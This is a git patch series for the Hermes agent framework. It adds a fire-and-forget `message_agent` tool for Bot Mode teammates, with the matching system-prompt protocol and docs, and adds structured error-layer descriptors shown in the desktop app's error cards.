"").strip().lstrip("@") + if not raw_target: + return _err("target is required.", roster=teammates, peers=peers) + + sender_handle = _handle(me) + prefix = f"Message from 🤖 {sender_handle} (@{sender_handle}): " + + # ── peer target: '/' or a bare registered peer name ── + peer_match = _PEER_TARGET_RE.match(raw_target) + bare_peer = raw_target.lower() if raw_target.lower() in peers else None + if peer_match or bare_peer: + peer_name = peer_match.group(1) if peer_match else bare_peer + peer_profile = peer_match.group(2) if peer_match else None + if peer_name not in peers: + return _err( + f"No registered peer named '{peer_name}'.", roster=teammates, peers=peers + ) + dm_target = f"{peer_name}/{peer_profile}" if peer_profile else peer_name + command = f"hermes peer dm {shlex.quote(dm_target)} < {shlex.quote(_write_dm_file(prefix + body))}" + label = f"@{peer_profile or peer_name} on peer '{peer_name}'" + return _spawn_delivery(command, label, task_id=task_id, agent=agent) + + # ── local teammate ── + if not _LOCAL_TARGET_RE.match(raw_target): + return _err(f"Invalid target: {raw_target!r}.", roster=teammates, peers=peers) + resolved = _resolve_local_name(raw_target, roster) + if resolved is None: + return _err( + f"No teammate named '{raw_target}' on this install. " + "Pick a name from the roster (roles are listed in your system prompt).", + roster=teammates, + peers=peers, + ) + if resolved == me: + return _err("You can't message yourself. Pick a teammate from the roster.") + + dm_file = _write_dm_file(prefix + body) + command = ( + f"hermes -p {shlex.quote(resolved)} chat --in ~ -c \"Bot Chat\" " + f"--create-if-missing -Q --query-file {shlex.quote(dm_file)}" + ) + return _spawn_delivery(command, f"@{_handle(resolved)}", task_id=task_id, agent=agent) + + +def _write_dm_file(content: str) -> str: + """The message rides a temp file — never inline shell text.""" + fd, path = tempfile.mkstemp(prefix="hermes-dm-", suffix=".txt", text=True) + with os.fdopen(fd, "w", encoding="utf-8") as f: + f.write(content) + return path + + +def _spawn_delivery(command: str, label: str, *, task_id: Optional[str], agent: Any) -> str: + """Run the delivery command tracked + background, notify on completion.""" + try: + from tools.terminal_tool import terminal_tool + + raw = terminal_tool( + command, + background=True, + notify_on_complete=True, + task_id=task_id, + ) + try: + parsed = json.loads(raw) + except (ValueError, TypeError): + parsed = {} + proc_id = parsed.get("session_id") or "" + if parsed.get("error"): + return _err(f"Delivery to {label} failed to start: {parsed['error']}") + return json.dumps( + { + "status": "sent", + "to": label, + "detail": ( + f"Message dispatched to {label}. This is asynchronous — do NOT wait " + "or poll. Finish your turn now; when the delivery completes, its " + "notification carries the reply — relay it then, attributed to " + "that agent." + ), + **({"process_id": proc_id} if proc_id else {}), + "sent_at": int(time.time()), + } + ) + except Exception as exc: + logger.error("message_agent delivery spawn failed: %s", exc, exc_info=True) + return _err(f"Delivery to {label} could not be started: {exc}") + + +# ── agent-context helpers (mirror system_prompt.py's resolution) ───────────── + + +def _agent_home(agent: Any) -> str: + """The calling agent's OWN home (session-db derived), not ambient env.""" + try: + sdb = getattr(agent, "_session_db", None) + db_path = getattr(sdb, "db_path", None) + if db_path: + return str(Path(db_path).parent) + except Exception: + pass + return os.getenv("HERMES_HOME") or os.path.expanduser("~/.hermes") + + +def _session_title(agent: Any) -> str: + title = str(getattr(agent, "_session_title_hint", "") or "").strip() + if title: + return title + try: + sdb = getattr(agent, "_session_db", None) + sid = getattr(agent, "session_id", None) + if sdb and sid: + return str(sdb.get_session_title(sid) or "").strip() + except Exception: + pass + return "" diff --git a/tools/bot_mode_probe.py b/tools/bot_mode_probe.py index b8a588d992..66935f8c7e 100644 --- a/tools/bot_mode_probe.py +++ b/tools/bot_mode_probe.py @@ -105,6 +105,51 @@ def _handle(name: str) -> str: return "hermes" if name == "default" else name +def _profile_role(profile_dir: Path) -> str: + """A teammate's role line: Bot Mode title, else profile description. + + The ui_meta['hermes-bots'].title is the name the user gave the bot in + Bot Mode; profile.yaml's description is the profile's stated purpose. + Either one tells a teammate WHO to message for a given job. Bounded and + single-line; empty when neither exists. Never raises. + """ + meta = profile_dir / "profile.yaml" + try: + if not meta.is_file(): + return "" + raw = meta.read_text(encoding="utf-8", errors="replace") + import yaml + + data = yaml.safe_load(raw) + if not isinstance(data, dict): + return "" + parts = [] + ui_meta = data.get("ui_meta") + if isinstance(ui_meta, dict) and isinstance(ui_meta.get("hermes-bots"), dict): + title = str(ui_meta["hermes-bots"].get("title") or "").strip() + if title: + parts.append(title) + description = str(data.get("description") or "").strip() + if description: + parts.append(description) + line = " — ".join(parts) + return " ".join(line.split())[:160] + except Exception: + return "" + + +def _roster_lines(root: Path, me: str) -> list[str]: + """One '- `@handle` — role' line per teammate (excluding ``me``).""" + lines = [] + for name, profile_dir in _roster(root): + if name == me: + continue + role = _profile_role(profile_dir) + handle = _handle(name) + lines.append(f"- `@{handle}`" + (f" — {role}" if role else "")) + return lines + + def _peers(root: Path) -> list[str]: """Registered peer gateway names (``hermes peer``), for the protocol text. @@ -137,15 +182,10 @@ def _peer_paragraph(root: Path) -> str: listed = ", ".join(f"`{p}`" for p in peers) return ( "\n\nTeammates on OTHER machines: this install also has peer gateways " - f"registered ({listed}). Message an agent on a peer the same way — write " - "the message to a temp file first, then pipe it on stdin (same terminal-" - "tool pattern: background=true, notify_on_complete=true; the reply prints " - "on stdout when it completes):\n" - "```\n" - "hermes peer dm / < /tmp/dm.txt\n" - "```\n" - "Use `` alone for the peer's main agent. Run `hermes peer list` " - "for the live peer list." + f"registered ({listed}). Message an agent on a peer the same way — " + 'message_agent with target "/" (or "" alone ' + "for the peer's main agent). Run `hermes peer list` for the live " + "peer list." ) @@ -164,26 +204,32 @@ def _build_section(home: Path) -> str: return "" handle = _handle(me) - teammates = ", ".join(f"`{n}`" for n, _d in roster if n != me) or "(none yet)" + roster_block = "\n".join(_roster_lines(root, me)) or "- (no teammates yet)" return ( f"{_PROTOCOL_HEADING}\n" "This install runs Bot Mode: each Hermes profile is an agent teammate with " - 'one canonical "Bot Chat" conversation. To message a teammate: write the ' - "message to a temp file with the file tool FIRST (never inline it into the " - "command — quotes truncate it and $( ) would execute), then run on the " - "terminal tool (background=true, notify_on_complete=true) and finish your " - "turn — the reply arrives later as a new message:\n" - "```\n" - f'hermes -p chat --in ~ -c "Bot Chat" --create-if-missing -Q --query-file /tmp/dm.txt\n' - "```\n" - f'The file must open with the "Message from 🤖 {handle} (@{handle}):" prefix so they ' - "know who is talking. When YOU receive a message with that prefix, you are " - "being messaged by a teammate agent — address them (not the user) and reply " - "concisely. When the user says \"ask \" or \"tell ...\", that is a " - "handoff: message that agent, wait for the reply, and report back, saying " - "which agent it came from. Run `hermes profile list` for the LIVE teammate " - f"list before a handoff. Teammates at session start: {teammates}." + 'one canonical "Bot Chat" conversation, and you have the `message_agent` ' + "tool to DM any of them. It is FIRE-AND-FORGET: it delivers your message " + "with your attribution prefixed automatically and returns an acknowledgement " + "immediately — it never returns the reply. Send it, finish your turn, and " + "the reply arrives later as a background-process completion notification " + "that wakes you; relay it to the user then, attributed to that agent. " + "COMPOSE every message yourself — say what YOU need from that agent; never " + "forward the user's words verbatim, and never reveal private 1:1 chat " + "content. When the user says \"ask \" or \"tell ...\", that is " + "a handoff: pick the right teammate from the roster below, message them " + "with message_agent, and report back naming which agent replied. Message " + "ONE clearly relevant teammate; don't fan out to several unless the user " + "explicitly asked.\n" + f'When YOU receive a "Message from 🤖 (@):" message, a ' + "teammate agent is talking to you (not the user): address them, reply " + "concisely via message_agent to their handle, and if it is a pure FYI " + "with nothing to add, staying silent is fine — never ping-pong " + "acknowledgements.\n" + f"You are `@{handle}`. Your teammates (live roster; roles from their " + "profiles):\n" + f"{roster_block}" + _peer_paragraph(root) ) @@ -275,8 +321,18 @@ def capability_fingerprint(home: str | os.PathLike | None = None) -> str: try: root = _hermes_root(resolved) surface["roster"] = sorted(n for n, d in _roster(root) if _is_bot_managed(d)) + # Roles are part of the messaging surface: renaming a bot or editing + # a profile description must refresh eternal Bot Chat prompts so the + # roster block teammates pick recipients from stays current. + surface["roster_roles"] = sorted( + f"{n}:{_profile_role(d)}" for n, d in _roster(root) + ) except Exception: surface["roster"] = [] + # Protocol-text version salt: bumping this refreshes every eternal Bot + # Chat prompt ONCE so existing bots adopt a new protocol section (e.g. + # the v2 message_agent tool replacing the shellout instructions). + surface["protocol_version"] = 2 try: # Peer gateways are part of the messaging surface: registering one # must refresh eternal Bot Chat prompts so the cross-machine DM diff --git a/website/docs/user-guide/bot-mode.md b/website/docs/user-guide/bot-mode.md index 4eeaeb91df..bd9632dede 100644 --- a/website/docs/user-guide/bot-mode.md +++ b/website/docs/user-guide/bot-mode.md @@ -97,7 +97,7 @@ Bots message each other with attribution, and you can hand work off from any cha - **@mentions** — type `@researcher have a look at this` in any chat and the active Bot hands the message off, waits for the reply, and reports back. Mention names are validated against the live roster, so an email address or an unknown `@` passes through untouched. - **Renamed Bots keep their tags in sync** — give a Bot a friendly name (the pencil in its chat header, or `hermes profile rename`) and it becomes taggable by that name: a Bot titled *Research Buddy* answers to `@research-buddy` (and `@researchbuddy`), in regular chats and in group rooms alike. The composer's `@` autocomplete offers the renamed tag and also matches when you type the old profile name, which keeps resolving too. - **@mentions across machines** — mentioning a Bot that lives on another registered connection (use its `@name-device` handle when names collide) delivers over the Connections registry in the background: the active Bot stays on this device, the desktop routes the message to the recipient's machine, and the reply is relayed back attributed to that agent. Your window's gateway never switches. -- **Direct messages** — a Bot reaches a teammate's Bot Chat through the standard CLI: it writes the message to a temp file (opening with the `Message from 🤖 (@):` prefix), then runs `hermes -p chat --in ~ -c "Bot Chat" --create-if-missing -Q --query-file `. The file transport means nothing is shell-interpreted — quotes, `$(...)`, and backticks in the message arrive verbatim. The receiving Bot sees the message the next time it runs and knows how to reply, because the messaging protocol is part of its Bot Chat system prompt. +- **Direct messages** — every Bot Chat carries the `message_agent` tool: a Bot messages a teammate by calling `message_agent(target="researcher", message="…")`. The tool validates the target against the live roster, prefixes the sender's `Message from 🤖 (@):` attribution automatically, and delivers into the teammate's canonical Bot Chat. Delivery is **fire-and-forget**: the sender gets an acknowledgement, finishes its turn, and the reply arrives later as a background completion notification. The message travels as a real parameter (nothing shell-interpreted — quotes, `$(...)`, and backticks arrive verbatim), and the Bot composes its own message rather than forwarding your words. The teammate roster — names **and roles** from each profile's title/description — is part of every Bot Chat's system prompt, so Bots know who does what before choosing a recipient. The tool exists **only** in canonical Bot Chat sessions on Bot-Mode-managed installs; regular chats, group-room member sessions, and CLI sessions never see it. The backend teaches each Bot's canonical Bot Chat session the messaging protocol automatically at prompt-build time — including when a teammate opens it headlessly from the CLI. Only the canonical Bot Chat gets the protocol section; your regular sessions and your SOUL.md stay untouched. This is controlled by `agent.bot_mode_protocol` in `config.yaml` (default: on): @@ -123,7 +123,7 @@ hermes peer dm spark/researcher < /tmp/dm.txt # named profile on a multiplexed `hermes peer dm` delivers into the remote agent's canonical Bot Chat over the peer's existing API server, runs one agent turn there, and prints the reply on stdout — the exact cross-machine twin of the local `hermes -p chat` command. -Once a peer is registered, the messaging protocol taught to every Bot Chat (`agent.bot_mode_protocol`) automatically includes the peer roster and the `hermes peer dm` pattern — so **your bots learn on their own** that teammates exist on other machines and how to reach them. Registering or removing a peer refreshes each Bot Chat's protocol on its next message (capability epoch). +Once a peer is registered, the messaging protocol taught to every Bot Chat (`agent.bot_mode_protocol`) automatically includes the peer roster, and `message_agent` accepts peer targets directly — `message_agent(target="spark/researcher", …)`, or `target="spark"` for the peer's main agent — so **your bots learn on their own** that teammates exist on other machines and how to reach them. Registering or removing a peer refreshes each Bot Chat's protocol on its next message (capability epoch). Requirements: the peer machine runs the `api_server` gateway platform with a strong `API_SERVER_KEY`; reachability is your network's business (LAN, Tailscale, VPN). The key is a credential and lives in `~/.hermes/.env` as `HERMES_PEER__KEY`; peer names/URLs live in `config.yaml` under `bot_peers`. From 98f6fc549a338b3903b6e86e31b8b0210671b991 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 04:37:26 -0700 Subject: [PATCH 072/161] feat(desktop): failed turns name the failing layer with recovery actions MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Turn errors now carry a structured {layer, code, retryable} descriptor (agent/error_surface.py) built from the same classifier the retry loop uses. The tui_gateway stamps it on terminal error frames, retained failed-turn snapshots, and resume replay; the Desktop error card renders the layer title (provider / endpoint / streaming / auth / billing / gateway / runtime / disk) plus matched actions: Retry, Switch provider, Open logs, Copy diagnostics. Older backends that omit the descriptor keep today's behavior (generic title, string-sniff fallbacks) — the field is advisory on both sides. --- agent/error_surface.py | 223 ++++++++++++++++++ apps/desktop/electron/fs-ipc.ts | 6 + apps/desktop/electron/preload.ts | 1 + .../gateway-event/message-stream.ts | 9 +- .../session/hooks/use-message-stream/index.ts | 9 +- .../terminal-error-frame.test.tsx | 34 +++ .../hooks/use-session-actions/utils.ts | 13 +- .../assistant-ui/thread/assistant-message.tsx | 131 +++++++++- apps/desktop/src/global.d.ts | 2 + apps/desktop/src/i18n/ar.ts | 16 ++ apps/desktop/src/i18n/en.ts | 16 ++ apps/desktop/src/i18n/ja.ts | 16 ++ apps/desktop/src/i18n/types.ts | 18 ++ apps/desktop/src/i18n/zh-hant.ts | 16 ++ apps/desktop/src/i18n/zh.ts | 16 ++ apps/desktop/src/lib/chat-messages/types.ts | 9 + apps/desktop/src/lib/chat-runtime.ts | 2 + apps/desktop/src/lib/error-surface.test.ts | 58 +++++ apps/desktop/src/lib/error-surface.ts | 71 ++++++ apps/desktop/src/styles.css | 22 ++ apps/desktop/src/types/hermes.ts | 3 + tests/agent/test_error_surface.py | 167 +++++++++++++ .../tui_gateway/test_failed_turn_retention.py | 60 +++++ tui_gateway/methods_prompt.py | 3 + tui_gateway/server.py | 64 ++++- website/docs/user-guide/desktop.md | 20 ++ 26 files changed, 982 insertions(+), 23 deletions(-) create mode 100644 agent/error_surface.py create mode 100644 apps/desktop/src/lib/error-surface.test.ts create mode 100644 apps/desktop/src/lib/error-surface.ts create mode 100644 tests/agent/test_error_surface.py diff --git a/agent/error_surface.py b/agent/error_surface.py new file mode 100644 index 0000000000..0f20b79900 --- /dev/null +++ b/agent/error_surface.py @@ -0,0 +1,223 @@ +"""Structured error-surface descriptors for UI clients (Desktop/TUI). + +Maps the internal failure taxonomy (``agent.error_classifier.FailoverReason`` +values carried in turn results as ``failure_reason``, or raw exceptions from +the turn dispatcher) onto a small, stable wire descriptor: + + {"layer": , "code": , "retryable": } + +The *layer* names which part of the stack failed, so clients can say +"Provider error" / "Gateway error" instead of toasting an opaque string and +leaving the user to guess whether the model, the gateway, or the app froze: + + provider — the model/provider API rejected or failed the call + endpoint — a user-configured custom/local endpoint failed (transport) + streaming — the provider's SSE/stream connection dropped mid-turn + auth — authentication/authorization failed + billing — credits/quota wall (clients usually have a richer + billing_block descriptor; this is the fallback signal) + gateway — the local gateway/agent runtime itself errored + runtime — agent initialization / local environment failure + disk — local disk full / persistence failure + +This module is intentionally dependency-light and NEVER raises: surfacing +diagnostics must not be able to break the error path it describes. Clients +treat the descriptor as advisory — an absent or partial descriptor falls +back to today's string-sniffing behavior (older backends keep working). +""" + +from __future__ import annotations + +import logging +from typing import Any, Optional + +logger = logging.getLogger(__name__) + +# UI layers (wire values — stable contract with desktop/TUI clients). +LAYER_PROVIDER = "provider" +LAYER_ENDPOINT = "endpoint" +LAYER_STREAMING = "streaming" +LAYER_AUTH = "auth" +LAYER_BILLING = "billing" +LAYER_GATEWAY = "gateway" +LAYER_RUNTIME = "runtime" +LAYER_DISK = "disk" + +# failure_reason (FailoverReason.value) → UI layer. Reasons not listed fall +# back to LAYER_PROVIDER: every FailoverReason is produced by classifying a +# provider API call, so "the provider call failed" is the honest default. +_REASON_TO_LAYER = { + "auth": LAYER_AUTH, + "auth_permanent": LAYER_AUTH, + "billing": LAYER_BILLING, + "billing_unverified": LAYER_BILLING, +} + +# Transport-ish reasons: the failure is between us and the base_url, not a +# verdict the provider returned. On a custom/local endpoint these point at +# the user's endpoint config, so they surface as LAYER_ENDPOINT there. +_TRANSPORT_REASONS = { + "timeout", + "ssl_cert_verification", +} + +# Reasons that are deterministic for the request — a bare "Retry" repeats the +# same failure, so clients shouldn't lead with it. +_NON_RETRYABLE_REASONS = { + "auth_permanent", + "billing", + "content_policy_blocked", + "provider_policy_blocked", + "model_not_found", + "ssl_cert_verification", +} + +# Providers whose base_url is user-supplied rather than a known vendor — +# transport failures against these are endpoint-config problems. +_CUSTOM_ENDPOINT_PROVIDERS = { + "custom", + "local", + "llama.cpp", + "llamacpp", + "ollama", + "lmstudio", + "vllm", +} + +# Message fragments that mark a mid-stream connection drop. Deliberately +# narrow: these strings come from our own retry-exhaustion summaries and the +# OpenAI SDK's stream-abort errors. +_STREAM_DROP_FRAGMENTS = ( + "stream connection", + "peer closed connection", + "incomplete chunked read", + "connection broken", + "stream ended prematurely", + "sse", + "mid-stream", +) + +# Exception modules that indicate the failure came from an API/transport call +# (vs. a bug in our own dispatcher code, which is a gateway-layer failure). +_API_EXC_MODULE_PREFIXES = ( + "openai", + "httpx", + "httpcore", + "anthropic", + "ssl", + "socket", + "urllib", +) + + +def _is_custom_endpoint(provider: Optional[str]) -> bool: + p = (provider or "").strip().lower() + return p in _CUSTOM_ENDPOINT_PROVIDERS or p.startswith("custom:") + + +def _looks_like_stream_drop(message: str) -> bool: + msg = message.lower() + return any(fragment in msg for fragment in _STREAM_DROP_FRAGMENTS) + + +def _surface(layer: str, code: str, retryable: bool) -> dict: + return {"layer": layer, "code": code, "retryable": bool(retryable)} + + +def build_error_surface_from_result( + result: Any, provider: str = "", model: str = "" +) -> Optional[dict]: + """Descriptor for a returned-error turn result (``failed=True`` dicts). + + Reads the ``failure_reason`` the conversation loop already stamps + (a ``FailoverReason.value``) plus the error text, and maps them onto a + UI layer. Returns None when the result carries no failure signal. + """ + try: + if not isinstance(result, dict): + return None + error_text = str(result.get("error") or "") + reason = str(result.get("failure_reason") or "").strip() + if not error_text and not reason: + return None + + # Disk-full wins outright: the fix (free space) is unrelated to the + # provider stack, and hermes_state owns the pattern list. + try: + from hermes_state import is_disk_full_error + + if error_text and is_disk_full_error(error_text): + return _surface(LAYER_DISK, "disk_full", False) + except Exception: # pragma: no cover - defensive import guard + pass + + if result.get("billing_block") or reason in ("billing", "billing_unverified"): + return _surface(LAYER_BILLING, reason or "billing", False) + + if not reason: + # Failed result without a classified reason (legacy paths). + if _looks_like_stream_drop(error_text): + return _surface(LAYER_STREAMING, "stream_drop", True) + return _surface(LAYER_PROVIDER, "unknown", True) + + layer = _REASON_TO_LAYER.get(reason) + if layer is None: + if reason in _TRANSPORT_REASONS and _is_custom_endpoint(provider): + layer = LAYER_ENDPOINT + elif _looks_like_stream_drop(error_text): + layer = LAYER_STREAMING + else: + layer = LAYER_PROVIDER + return _surface(layer, reason, reason not in _NON_RETRYABLE_REASONS) + except Exception: # pragma: no cover — never break the error path + logger.debug("error_surface: result classification failed", exc_info=True) + return None + + +def build_error_surface_from_exception( + exc: BaseException, provider: str = "", model: str = "" +) -> Optional[dict]: + """Descriptor for an exception that escaped the turn dispatcher. + + API/transport exceptions are classified through the real + ``classify_api_error`` pipeline (same taxonomy as the retry loop); + anything else is a gateway-layer failure — a bug or environment problem + in our own dispatcher, not a provider verdict. + """ + try: + message = str(exc) or type(exc).__name__ + + try: + from hermes_state import is_disk_full_error + + if is_disk_full_error(exc): + return _surface(LAYER_DISK, "disk_full", False) + except Exception: # pragma: no cover - defensive import guard + pass + + exc_module = type(exc).__module__ or "" + api_like = exc_module.split(".")[0] in _API_EXC_MODULE_PREFIXES or hasattr( + exc, "status_code" + ) + + if not api_like or not isinstance(exc, Exception): + return _surface(LAYER_GATEWAY, type(exc).__name__, True) + + from agent.error_classifier import classify_api_error + + classified = classify_api_error(exc, provider=provider, model=model) + reason = classified.reason.value + + synthetic = { + "error": classified.message or message, + "failure_reason": reason, + } + surface = build_error_surface_from_result( + synthetic, provider=provider, model=model + ) + if surface is not None: + surface["retryable"] = bool(classified.retryable) + return surface + except Exception: # pragma: no cover — never break the error path + logger.debug("error_surface: exception classification failed", exc_info=True) + return None diff --git a/apps/desktop/electron/fs-ipc.ts b/apps/desktop/electron/fs-ipc.ts index ff25db2013..61a3cb7db2 100644 --- a/apps/desktop/electron/fs-ipc.ts +++ b/apps/desktop/electron/fs-ipc.ts @@ -98,6 +98,12 @@ export function registerFsIpc({ ipcMain.handle('hermes:fs:desktopPluginsRoot', async () => localPluginsRoot('desktop-plugins')) + // The LOCAL logs root (`/logs`, profile-aware) — the error + // card's "Open Logs" action reveals agent.log/gateway.log without the user + // knowing where HERMES_HOME lives. Same Electron-local resolution as the + // plugin roots: valid in every connection mode, created on demand. + ipcMain.handle('hermes:fs:logsRoot', async () => localPluginsRoot('logs')) + // The LOCAL agent-plugin root (`/plugins`), same Electron-local // resolution as above. This is the desktop half of a UNIFIED plugin package: // an agent plugin may ship `desktop/plugin.js` alongside its Python code (the diff --git a/apps/desktop/electron/preload.ts b/apps/desktop/electron/preload.ts index 7d8dac57af..7eac06bd52 100644 --- a/apps/desktop/electron/preload.ts +++ b/apps/desktop/electron/preload.ts @@ -269,6 +269,7 @@ contextBridge.exposeInMainWorld('hermesDesktop', { revealPath: targetPath => ipcRenderer.invoke('hermes:fs:reveal', targetPath), openDir: dirPath => ipcRenderer.invoke('hermes:fs:openDir', dirPath), desktopPluginsRoot: () => ipcRenderer.invoke('hermes:fs:desktopPluginsRoot'), + logsRoot: () => ipcRenderer.invoke('hermes:fs:logsRoot'), agentPluginsRoot: () => ipcRenderer.invoke('hermes:fs:agentPluginsRoot'), renamePath: (targetPath, newName) => ipcRenderer.invoke('hermes:fs:rename', targetPath, newName), writeTextFile: (filePath, content) => ipcRenderer.invoke('hermes:fs:writeText', filePath, content), diff --git a/apps/desktop/src/app/session/hooks/use-message-stream/gateway-event/message-stream.ts b/apps/desktop/src/app/session/hooks/use-message-stream/gateway-event/message-stream.ts index 5efba27561..43be63e190 100644 --- a/apps/desktop/src/app/session/hooks/use-message-stream/gateway-event/message-stream.ts +++ b/apps/desktop/src/app/session/hooks/use-message-stream/gateway-event/message-stream.ts @@ -4,6 +4,7 @@ import { burstVibeHearts } from '@/components/chat/vibe-hearts' import { translateNow } from '@/i18n' import { coerceGatewayText, coerceThinkingText } from '@/lib/chat-runtime' import { playCompletionSound } from '@/lib/completion-sound' +import { parseErrorSurface } from '@/lib/error-surface' import { triggerHaptic } from '@/lib/haptics' import { billingCtaLabel, clearBillingBlock, runBillingRecovery, setBillingBlock } from '@/store/billing-block' import { clearClarifyRequest } from '@/store/clarify' @@ -335,13 +336,15 @@ export function handleMessageStreamEvent(ctx: GatewayEventContext): boolean { const finalText = coerceGatewayText(payload?.text) || coerceGatewayText(payload?.rendered) // Terminal error frames (status "error") carry the failure in - // structured fields: `error` is the message, and `partial` marks - // `text` as streamed output to keep rather than the error string. + // structured fields: `error` is the message, `partial` marks + // `text` as streamed output to keep rather than the error string, and + // `error_surface` (newer gateways) names the failing layer for the card. const failure = payload?.status === 'error' ? { error: coerceGatewayText(payload.error).trim() || finalText || 'Hermes reported an error', - partial: Boolean(payload.partial) + partial: Boolean(payload.partial), + surface: parseErrorSurface(payload.error_surface) } : undefined diff --git a/apps/desktop/src/app/session/hooks/use-message-stream/index.ts b/apps/desktop/src/app/session/hooks/use-message-stream/index.ts index b7eeae2a17..36cec7c71d 100644 --- a/apps/desktop/src/app/session/hooks/use-message-stream/index.ts +++ b/apps/desktop/src/app/session/hooks/use-message-stream/index.ts @@ -17,6 +17,7 @@ import { sealOpenToolParts, upsertToolPart } from '@/lib/chat-messages' +import type { ErrorSurface } from '@/lib/error-surface' import { dedupeGeneratedImageEchoesInParts, generatedImageEchoSources, @@ -561,7 +562,7 @@ export function useMessageStream({ sessionId: string, text: string, responsePreviewed?: boolean, - failure?: { error: string; partial: boolean }, + failure?: { error: string; partial: boolean; surface?: ErrorSurface | null }, occurredAt = Date.now() / 1000 ) => { let shouldHydrate = false @@ -616,7 +617,8 @@ export function useMessageStream({ parts: completeOpenTimelineParts(message.parts, occurredAt), pending: false, interim: false, - ...(durationS !== undefined ? { durationS } : {}) + ...(durationS !== undefined ? { durationS } : {}), + ...(completionError && failure?.surface ? { errorSurface: failure.surface } : {}) } if (completionError && !keepFailedPartialText) { @@ -641,7 +643,8 @@ export function useMessageStream({ completedAt: occurredAt, branchGroupId: state.pendingBranchGroup ?? undefined, ...(durationS !== undefined ? { durationS } : {}), - ...(completionError && { error: completionError }) + ...(completionError && { error: completionError }), + ...(completionError && failure?.surface ? { errorSurface: failure.surface } : {}) }) const prev = state.messages diff --git a/apps/desktop/src/app/session/hooks/use-message-stream/terminal-error-frame.test.tsx b/apps/desktop/src/app/session/hooks/use-message-stream/terminal-error-frame.test.tsx index 303cf10a2e..8ecefe8e09 100644 --- a/apps/desktop/src/app/session/hooks/use-message-stream/terminal-error-frame.test.tsx +++ b/apps/desktop/src/app/session/hooks/use-message-stream/terminal-error-frame.test.tsx @@ -78,4 +78,38 @@ describe('terminal error message.complete frames', () => { const bubble = lastAssistant() expect(bubble?.error).toBe('Error: something broke') }) + + it('attaches the structured error_surface descriptor to the failed bubble', async () => { + mountStream() + await start() + await delta('…') + + await completeWithError({ + text: 'Error: rate limited', + error: 'rate limited', + error_surface: { layer: 'provider', code: 'rate_limit', retryable: true }, + recoverable: true + }) + + const bubble = lastAssistant() + expect(bubble?.error).toBe('rate limited') + expect(bubble?.errorSurface).toEqual({ layer: 'provider', code: 'rate_limit', retryable: true }) + }) + + it('ignores a garbled error_surface payload (older/foreign backends)', async () => { + mountStream() + await start() + await delta('…') + + await completeWithError({ + text: 'Error: kaput', + error: 'kaput', + error_surface: { layer: 'not-a-layer', code: 42 }, + recoverable: true + }) + + const bubble = lastAssistant() + expect(bubble?.error).toBe('kaput') + expect(bubble?.errorSurface).toBeUndefined() + }) }) diff --git a/apps/desktop/src/app/session/hooks/use-session-actions/utils.ts b/apps/desktop/src/app/session/hooks/use-session-actions/utils.ts index 6474b93431..79c02e844c 100644 --- a/apps/desktop/src/app/session/hooks/use-session-actions/utils.ts +++ b/apps/desktop/src/app/session/hooks/use-session-actions/utils.ts @@ -3,6 +3,7 @@ import { getSession } from '@/hermes' import { assistantTextPart, type ChatMessage, chatMessageText, textPart } from '@/lib/chat-messages' import { normalizePersonalityValue } from '@/lib/chat-runtime' import { embeddedImageUrls, textWithoutEmbeddedImages } from '@/lib/embedded-images' +import { parseErrorSurface } from '@/lib/error-surface' import { reconcileApprovalModeForProfile } from '@/store/approval-mode' import { requestDesktopOnboardingForCredentialWarning } from '@/store/onboarding' import { $activeGatewayProfile, $profiles, normalizeProfileKey } from '@/store/profile' @@ -146,6 +147,9 @@ const COMPARED_FIELDS = [ 'role', 'pending', 'error', + // Structured failure layer — drives the error card's title and action row, + // so a change (e.g. resume replay attaching the descriptor) must repaint. + 'errorSurface', 'hidden', 'branchGroupId', 'interim', @@ -254,6 +258,11 @@ export function chatMessagesEquivalent(a: ChatMessage, b: ChatMessage): boolean a.role !== b.role || a.pending !== b.pending || a.error !== b.error || + // Structural compare — the descriptor arrives as a fresh object per + // resume/replay, so identity comparison would repaint forever. + (a.errorSurface?.layer ?? null) !== (b.errorSurface?.layer ?? null) || + (a.errorSurface?.code ?? null) !== (b.errorSurface?.code ?? null) || + (a.errorSurface?.retryable ?? null) !== (b.errorSurface?.retryable ?? null) || a.hidden !== b.hidden || a.branchGroupId !== b.branchGroupId || a.timestamp !== b.timestamp || @@ -742,6 +751,7 @@ export function appendLiveSessionProjection(messages: ChatMessage[], projection: // the terminal frame may have been lost to a disconnect) — surface the // failure on the projected row instead of rendering the partial as healthy. const inflightError = projection.inflight?.error?.trim() ?? '' + const inflightErrorSurface = parseErrorSurface(projection.inflight?.error_surface) const queuedUser = projection.queued?.user?.trim() ?? '' if ( @@ -904,7 +914,8 @@ export function appendLiveSessionProjection(messages: ChatMessage[], projection: role: 'assistant', parts: inflightAssistant ? [assistantTextPart(inflightAssistant)] : [], pending: inflightStreaming, - ...(inflightError ? { error: inflightError } : {}) + ...(inflightError ? { error: inflightError } : {}), + ...(inflightError && inflightErrorSurface ? { errorSurface: inflightErrorSurface } : {}) }) } diff --git a/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx b/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx index f2cfdc09c1..1358327876 100644 --- a/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx +++ b/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx @@ -8,8 +8,10 @@ import { } from '@assistant-ui/react' import { useStore } from '@nanostores/react' import { type FC, type ReactNode, useCallback, useMemo, useState } from 'react' +import { useNavigate } from 'react-router' import { useSessionView } from '@/app/chat/session-view' +import { SETTINGS_ROUTE } from '@/app/routes' import { ChangedFilesCard } from '@/components/assistant-ui/thread/changed-files-card' import { contentHasVisibleText, @@ -28,6 +30,7 @@ import { PreviewAttachment } from '@/components/chat/preview-attachment' import { Codicon } from '@/components/ui/codicon' import { CopyButton } from '@/components/ui/copy-button' import { useI18n } from '@/i18n' +import { type ErrorSurface, formatErrorDiagnostics } from '@/lib/error-surface' import { triggerHaptic } from '@/lib/haptics' import { AudioLines, GitForkIcon, Loader2Icon, RefreshCwIcon, SmilePlusIcon, VolumeXIcon, XIcon } from '@/lib/icons' import { extractPreviewTargets } from '@/lib/preview-targets' @@ -36,6 +39,7 @@ import { useEnterAnimation } from '@/lib/use-enter-animation' import { cn } from '@/lib/utils' import { playSpeechText, stopVoicePlayback } from '@/lib/voice-playback' import { notifyError } from '@/store/notifications' +import { $currentModel } from '@/store/session' import { $voicePlayback } from '@/store/voice-playback' // Stable empty identity for the settled-parts selector — a fresh [] per render @@ -224,20 +228,26 